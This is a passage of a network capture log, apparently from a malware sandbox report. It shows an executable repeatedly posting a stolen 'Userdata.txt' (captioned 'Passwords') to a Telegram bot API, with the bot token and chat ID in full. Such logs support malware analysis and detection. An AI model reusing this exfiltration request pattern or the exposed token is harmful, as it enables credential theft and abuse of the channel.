2025-01-10 20:54:02 UTC	536	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 34 37 34 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 37 36 36 35 37 34 39 30 35 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 4c 6f 6b 61 5f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 32 30 36 35 32 34 32 39 31 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 6f 64 65 64 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 63 5f 64 65 64 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 32 34 34 31 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 55 Data Ascii: {"ok":true,"result":{"message_id":44742,"from":{"id":7766574905,"is_bot":true,"first_name":"Lavida","username":"LavidaLoka_Bot"},"chat":{"id":2065242915,"first_name":"Coded","username":"c_ded","type":"private"},"date":1736542441,"document":{"file_name":"U

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.5	50012	149.154.167.220	443	2672	C:\Users\user\Desktop\2CQ2zMn0hb.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 20:54:03 UTC	272	OUT	POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1 Content-Type: multipart/form-data; boundary================8dd32c36d0ba952 Host: api.telegram.org Content-Length: 1090
2025-01-10 20:54:03 UTC	1090	OUT	Data Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 32 63 33 36 64 30 62 61 39 35 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: --===============8dd32c36d0ba952Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
2025-01-10 20:54:03 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Fri, 10 Jan 2025 20:54:03 GMT Content-Type: application/json Content-Length: 536 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-01-10 20:54:03 UTC	536	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 34 37 34 33 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 37 36 36 35 37 34 39 30 35 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 4c 6f 6b 61 5f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 32 30 36 35 32 34 32 39 31 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 6f 64 65 64 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 63 5f 64 65 64 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 32 34 34 33 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 55 Data Ascii: {"ok":true,"result":{"message_id":44743,"from":{"id":7766574905,"is_bot":true,"first_name":"Lavida","username":"LavidaLoka_Bot"},"chat":{"id":2065242915,"first_name":"Coded","username":"c_ded","type":"private"},"date":1736542443,"document":{"file_name":"U

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.5	50014	149.154.167.220	443	2672	C:\Users\user\Desktop\2CQ2zMn0hb.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 20:54:05 UTC	272	OUT	POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1 Content-Type: multipart/form-data; boundary================8dd32d60ea18c5f Host: api.telegram.org Content-Length: 1090
2025-01-10 20:54:05 UTC	1090	OUT	Data Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 32 64 36 30 65 61 31 38 63 35 66 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: --===============8dd32d60ea18c5fContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
2025-01-10 20:54:05 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Fri, 10 Jan 2025 20:54:05 GMT Content-Type: application/json Content-Length: 536 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-01-10 20:54:05 UTC	536	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 34 37 34 34 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 37 36 36 35 37 34 39 30 35 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 4c 6f 6b 61 5f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 32 30 36 35 32 34 32 39 31 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 6f 64 65 64 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 63 5f 64 65 64 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 32 34 34 35 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 55 Data Ascii: {"ok":true,"result":{"message_id":44744,"from":{"id":7766574905,"is_bot":true,"first_name":"Lavida","username":"LavidaLoka_Bot"},"chat":{"id":2065242915,"first_name":"Coded","username":"c_ded","type":"private"},"date":1736542445,"document":{"file_name":"U

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.5	50016	149.154.167.220	443	2672	C:\Users\user\Desktop\2CQ2zMn0hb.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 20:54:06 UTC	272	OUT	POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1 Content-Type: multipart/form-data; boundary================8dd32e8a22dce36 Host: api.telegram.org Content-Length: 1090
2025-01-10 20:54:06 UTC	1090	OUT	Data Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 32 65 38 61 32 32 64 63 65 33 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: --===============8dd32e8a22dce36Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
2025-01-10 20:54:06 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Fri, 10 Jan 2025 20:54:06 GMT Content-Type: application/json Content-Length: 536 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-01-10 20:54:06 UTC	536	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 34 37 34 35 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 37 36 36 35 37 34 39 30 35 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 4c 6f 6b 61 5f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 32 30 36 35 32 34 32 39 31 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 6f 64 65 64 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 63 5f 64 65 64 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 32 34 34 36 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 55 Data Ascii: {"ok":true,"result":{"message_id":44745,"from":{"id":7766574905,"is_bot":true,"first_name":"Lavida","username":"LavidaLoka_Bot"},"chat":{"id":2065242915,"first_name":"Coded","username":"c_ded","type":"private"},"date":1736542446,"document":{"file_name":"U

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.5	50018	149.154.167.220	443	2672	C:\Users\user\Desktop\2CQ2zMn0hb.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 20:54:08 UTC	272	OUT	POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1 Content-Type: multipart/form-data; boundary================8dd32fb286e642d Host: api.telegram.org Content-Length: 1090
2025-01-10 20:54:08 UTC	1090	OUT	Data Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 32 66 62 32 38 36 65 36 34 32 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: --===============8dd32fb286e642dContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
2025-01-10 20:54:08 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Fri, 10 Jan 2025 20:54:08 GMT Content-Type: application/json Content-Length: 536 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-01-10 20:54:08 UTC	536	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 34 37 34 36 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 37 36 36 35 37 34 39 30 35 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 4c 6f 6b 61 5f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 32 30 36 35 32 34 32 39 31 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 6f 64 65 64 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 63 5f 64 65 64 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 32 34 34 38 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 55 Data Ascii: {"ok":true,"result":{"message_id":44746,"from":{"id":7766574905,"is_bot":true,"first_name":"Lavida","username":"LavidaLoka_Bot"},"chat":{"id":2065242915,"first_name":"Coded","username":"c_ded","type":"private"},"date":1736542448,"document":{"file_name":"U

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.5	50020	149.154.167.220	443	2672	C:\Users\user\Desktop\2CQ2zMn0hb.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 20:54:09 UTC	272	OUT	POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1 Content-Type: multipart/form-data; boundary================8dd330da1445301 Host: api.telegram.org Content-Length: 1090
2025-01-10 20:54:09 UTC	1090	OUT	Data Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 33 30 64 61 31 34 34 35 33 30 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: --===============8dd330da1445301Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
2025-01-10 20:54:10 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Fri, 10 Jan 2025 20:54:10 GMT Content-Type: application/json Content-Length: 536 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-01-10 20:54:10 UTC	536	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 34 37 34 37 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 37 36 36 35 37 34 39 30 35 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 4c 6f 6b 61 5f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 32 30 36 35 32 34 32 39 31 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 6f 64 65 64 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 63 5f 64 65 64 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 32 34 35 30 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 55 Data Ascii: {"ok":true,"result":{"message_id":44747,"from":{"id":7766574905,"is_bot":true,"first_name":"Lavida","username":"LavidaLoka_Bot"},"chat":{"id":2065242915,"first_name":"Coded","username":"c_ded","type":"private"},"date":1736542450,"document":{"file_name":"U

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.5	50022	149.154.167.220	443	2672	C:\Users\user\Desktop\2CQ2zMn0hb.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 20:54:11 UTC	272	OUT	POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1 Content-Type: multipart/form-data; boundary================8dd33200b7db480 Host: api.telegram.org Content-Length: 1090
2025-01-10 20:54:11 UTC	1090	OUT	Data Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 33 32 30 30 62 37 64 62 34 38 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: --===============8dd33200b7db480Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
2025-01-10 20:54:12 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Fri, 10 Jan 2025 20:54:12 GMT Content-Type: application/json Content-Length: 537 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-01-10 20:54:12 UTC	537	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 34 37 34 38 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 37 36 36 35 37 34 39 30 35 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 4c 6f 6b 61 5f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 32 30 36 35 32 34 32 39 31 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 6f 64 65 64 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 63 5f 64 65 64 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 32 34 35 32 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 55 Data Ascii: {"ok":true,"result":{"message_id":44748,"from":{"id":7766574905,"is_bot":true,"first_name":"Lavida","username":"LavidaLoka_Bot"},"chat":{"id":2065242915,"first_name":"Coded","username":"c_ded","type":"private"},"date":1736542452,"document":{"file_name":"U

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.5	50024	149.154.167.220	443	2672	C:\Users\user\Desktop\2CQ2zMn0hb.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 20:54:13 UTC	272	OUT	POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1 Content-Type: multipart/form-data; boundary================8dd3333b82a72fe Host: api.telegram.org Content-Length: 1090
2025-01-10 20:54:13 UTC	1090	OUT	Data Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 33 33 33 62 38 32 61 37 32 66 65 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: --===============8dd3333b82a72feContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
2025-01-10 20:54:13 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Fri, 10 Jan 2025 20:54:13 GMT Content-Type: application/json Content-Length: 536 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-01-10 20:54:13 UTC	536	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 34 37 34 39 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 37 36 36 35 37 34 39 30 35 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 4c 6f 6b 61 5f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 32 30 36 35 32 34 32 39 31 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 6f 64 65 64 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 63 5f 64 65 64 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 32 34 35 33 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 55 Data Ascii: {"ok":true,"result":{"message_id":44749,"from":{"id":7766574905,"is_bot":true,"first_name":"Lavida","username":"LavidaLoka_Bot"},"chat":{"id":2065242915,"first_name":"Coded","username":"c_ded","type":"private"},"date":1736542453,"document":{"file_name":"U

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.5	50026	149.154.167.220	443	2672	C:\Users\user\Desktop\2CQ2zMn0hb.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 20:54:15 UTC	272	OUT	POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1 Content-Type: multipart/form-data; boundary================8dd334605e9befd Host: api.telegram.org Content-Length: 1090
